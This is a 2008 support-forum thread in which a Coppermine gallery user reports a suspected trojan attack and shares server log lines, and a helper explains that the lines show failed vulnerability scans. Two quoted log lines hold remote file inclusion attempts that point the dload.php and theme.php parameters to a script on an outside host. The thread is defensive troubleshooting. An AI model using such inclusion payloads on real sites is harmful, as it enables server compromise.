[Closed]: Trojan Attack [Closed]: Trojan Attack
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

[Closed]: Trojan Attack

Started by empfl, April 10, 2008, 11:58:55 AM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

empfl

Hello to all,

Our home page became the victim of an Trojan Attack.
A Friend has looked at the log file and he thinks that the
attack was executed via Coppermine.

I would like to ask for help therefore here.
Has another user these problem already, too?
How can I take remedial action?

Following a couple of lines from the log file

80.190.202.154 - - [25/Mar/2008:22:37:23 +0100] "GET /coppermine/e107_plugins/my_gallery/dload.php?file=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619 www.xxxxxx-xxxxxxx.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
66.7.192.123 - - [26/Mar/2008:01:07:19 +0100] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 619 www.xxxxxx-xxxxxxx.de "-"
84.164.252.115 - - [07/Apr/2008:22:42:09 +0200] "GET /coppermine/scripts.js HTTP/1.1" 200 6578 www.xxxxxx-xxxxxxx.xx "http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115 - - [07/Apr/2008:22:42:10 +0200] "GET /Gallery/Saved/avuzuf/check.js HTTP/1.1" 403 623 www.xxxxxx-xxxxxxx.de "http://www.xxxxxx-xxxxxxx.de/coppermine/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13" "-"
84.164.252.115

Tanks for attention

empfl


Hello,

sorry, forgot to mention that we have installed the latest version: 1.4.16 (stable).
And we don't allow uploads from other users.

regards

Nibbler

Current issue is: http://forum.coppermine-gallery.net/index.php/topic,51671.0.html

However those log extracts do not indicate an actual hack, just failed attempts/scanning for vulnerabilities. The first 2 are even 404 which means you don't have the files they are looking for.

empfl

Many Thanks Nibbler,

but plz let me have a last question.

Are there any activities or efforts to close this security gap?

Thx

Nibbler

Naturally. Read the thread I posted.